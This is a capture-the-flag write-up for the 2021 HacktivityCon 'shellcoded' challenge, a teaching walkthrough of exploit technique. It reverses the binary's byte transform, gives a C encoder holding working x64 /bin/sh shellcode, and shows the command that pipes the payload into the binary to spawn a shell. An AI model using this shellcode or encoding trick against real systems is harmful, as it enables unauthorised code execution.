# shellcoded

## Files

{% embed url="<https://github.com/0xTen/CTFs/tree/main/hacktivitycon/2021/shellcoded>" %}

## The binary

![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-MjvbuWWyQ9SqRFnxnYS%2F-Mjvo1qkMebM45bb-8N5%2Fimage.png?alt=media\&token=da0f7b38-308c-4095-93dc-32e4a4b9a90a)

The binary does exactly what it says it does, runs your shellcode, but there is obviously a catch.

## Enconding

![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-MjvbuWWyQ9SqRFnxnYS%2F-MjvoHz619QvRjBuoZ24%2Fimage.png?alt=media\&token=f19d7715-a28b-4825-808e-4b66c8cae464)

This code will loop through the shellcode and, for each position, if it the index is an even number it will add 1 \* the index to the byte on that position, if it's an odd number, then it adds -1 \* the index to the byte. All we have to do to properly encode our shellcode is to do the same process, but subtracting instead of adding.

I wrote the following encoder for my shellcode:

```c
#include <stdio.h>
#include <string.h>

// x64 /bin/sh shellcode
unsigned char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";

int main(){
    int i;
    int v3;
    for (i = 0; strlen(shellcode) > i; i++){
        if ( (i & 1) != 0 ){
            v3 = -1;
        } else{
            v3 = 1;
        }
        shellcode[i] -= v3 * i;
    }
    printf(shellcode);
    
}
```

It's notable that I basically copied and pasted the original loop but replaced += with -= beacuse I want to do do the opposite operation.

## Final Exploit

After generating my shellcode and saving it to a file I called payload.bin, I simply used the following command to send it over.

```bash
(cat ./payload.bin; cat) | ./shellcoded
```